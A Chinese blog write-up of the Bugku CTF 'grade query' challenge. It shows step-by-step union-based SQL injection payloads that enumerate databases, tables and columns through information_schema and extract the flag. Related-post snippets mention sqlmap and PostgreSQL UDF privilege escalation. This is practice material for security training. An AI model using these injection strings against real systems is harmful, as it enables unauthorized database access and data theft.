Bugku 成绩查询

最新推荐文章于 2024-04-28 16:11:59 发布
最新推荐文章于 2024-04-28 16:11:59 发布
阅读量860 收藏 3
点赞数 5
文章标签: web sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63711447/article/details/124028649
版权

这道题按照正常的SQL注入步骤进行即可,没有绕弯弯的地方

1、打开题目环境,在输入框中输入数字1得到成绩回显,输入2和3也能得到相应的回显

2、测试参数包裹方式,输入1'没有得到回显

输入1'#进行注释,得到回显

3、用order by语句测试有几列,输入1' order by 4#时有回显,order by 5时无回显,说明有四列

4、接下使用联合查询语句测试有几个回显点,注意将前面的参数值置换为空,由图可知有三个回显点

5、查库名

输入-1'union select 1,2,3,group_concat(schema_name)from information_schema.schemata # 

 

 6、查表名

输入-1'union select 1,2,3,group_concat(table_name)from information_schema.tables where table_schema='skctf'#得到所有表名,可以看到一个fl4g的表

 

 7、查列名

输入-1' union select 1,2,3,group_concat(column_name)from information_schema.columns where table_name='fl4g'#

 8、查字段,查出skctf_flag中的数据

输入-1' union select 1,2,3,group_concat(skctf_flag)from skctf.fl4g#  得到flag

 

Eg-
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
BugKu——Web——成绩查询
m_de_g的博客
09-02 1797
BugKu——Web——成绩查询 1.拿到题目先测试注入点,分别输入了1,2,3,4;输入到4的时候没有回显 2.当我们输入1'时会报错,而我们使用1'#时就不会报错 3.测试or,and等关键字 1' or 1=1# 1' and 1=2# 发现没有被过滤 4.判断列名 1' order by 1,2,3# 三列,四列的时候依然回显正常,而当我们输入第五列的时候报错,说明有四列1' order by 1,2,3,4,5# 5.查看显位点 -1' union select 1,2,3,4#
一次简单的sql注入 bugku 成绩查询
jzw0831的博客
11-06 1082
一次简单的sql注入 bugku 成绩查询
bugkuCTF学生成绩查询writeup----sqlmap注入
qq_41492160的博客
12-08 2139
1.题目 2.查看是否存在注入漏洞 测试:如果id=1后面加‘ 不正常 加-- l恢复正常,说明存在数字型漏洞            两个都不正常说明不存在数字型注入           如果  id=1后面接 and  0   页面没有内容 and  1  页面正常显示内容说明有数字型漏洞           如果都不正常说明没有数字型漏洞 3.存在漏洞找注入点 使用burpsui...
Bugku-成绩查询
qq_56611811的博客
05-17 370
进入题目差不多能够猜到是关于sql注入的题,1'没有返回结果,1'#能够成功查询,这说明注释符是有效果的。2.当num是5时无法回显内容,说明表可能有4列。
bugku 成绩查询sql
qq_63875498的博客
12-04 750
bugku 成绩查询sql
bugku--成绩查询
hxhabcd123的博客
08-28 1331
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
BUGKU-成绩查询
m0_64180167的博客
12-03 893
打开环境 随便输入 发现URL 不传参 怀疑是POST型于是我们查看源代码发现是POST型打开终端因为是POST型 所以有两种方式语法:sqlmap -r "txt地址"kali中要下载数据包 我们在物理windows系统上的BP进行抓取 打包成文件然后把后缀改成.txt 通过共享文件传输到kali中,或者直接从桌面拖到kali桌面中打开sqlmap运行指令sqlmap -r "bugku.txt"于是我们开始爆破库sqlmap -r "bugku.txt" --tables 把库名和表名爆出来了然后我们发
【CTF-webbugku-成绩查询sql注入)
Sankkl1的博客
08-17 489
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
BUGKU CTF--web 基础{成绩查询}
lulu001128的博客
12-03 749
BUGKU CTF--web 基础{成绩查询}解题过程
bugku杂项题writeup
11-22
bugku杂项题writeup
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
oracle sql monitor简单使用说明
雅冰石的专栏
04-26 318
activity活动这里显示时间大多花在了哪里。
SqlSessionFactory
weixin_42594143的博客
04-26 413
在使用SqlSessionFactory时,需要注意的是,它是一个重量级的对象,一般情况下,应该尽量避免频繁地创建和销毁SqlSessionFactory对象,可以将其作为单例对象在整个应用中共享。SqlSessionFactory是MyBatis框架中的一个重要接口,用于创建SqlSession对象。SqlSessionFactory的主要作用是创建SqlSession对象,它是一个线程安全的对象,一般情况下,一个应用中只需要创建一个SqlSessionFactory对象即可,因为它的创建是比较耗时的。
攻防演练作为红方:postgresql提权之UDF提权 ,及其好用的工具
最新发布
keyboard专栏
04-28 364
在 PostgreSQL 中,用户定义的函数(UDF)提权是一种常见的提升权限的方法,尤其是当你已经获得了数据库的访问权限但需要更高级别系统权限时。UDF 提权涉及在数据库中创建或使用函数,这些函数可以执行系统级别的命令,从而允许攻击者在数据库服务器上执行任意代码。
SQL的基础语句
qq_51321722的博客
04-22 1468
因此在写子查询语句时,可以先测试下内层的子查询语句是否输出了想要的内容,再一层层往外测试,增加子查询正确率。使用SELECT查询时,如果结果集数据量很大,比如几万行数据,放在一个页面显示的话数据量太大,不如分页显示,每次显示100条。上述查询LIMIT 3 OFFSET 0表示,对结果集从0号记录开始,最多取3条。包含左边表的全部行(不管右边的表中是否存在与他们匹配的行),以及右边表中全部匹配的行。包含右边表的全部行(不管右边的表中是否存在与他们匹配的行),以及左边表中全部匹配的行。
Bugku post
09-21
根据提供的引用内容,Bugku post是一个题目的要求,要求在两秒内提交一道很长的计算题答案,并且式子每次刷新都会变动。需要使用POST方式传入一个变量名为value的值。具体的解题步骤包括创建一个Python文件,导入requests库和re库,并且创建一个函数来处理POST请求和计算题答案。然后,使用循环来不断刷新题目,获取题目提示,并通过POST请求提交答案。最后,将提交的答案复制粘贴到提交框中完成题目的提交。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值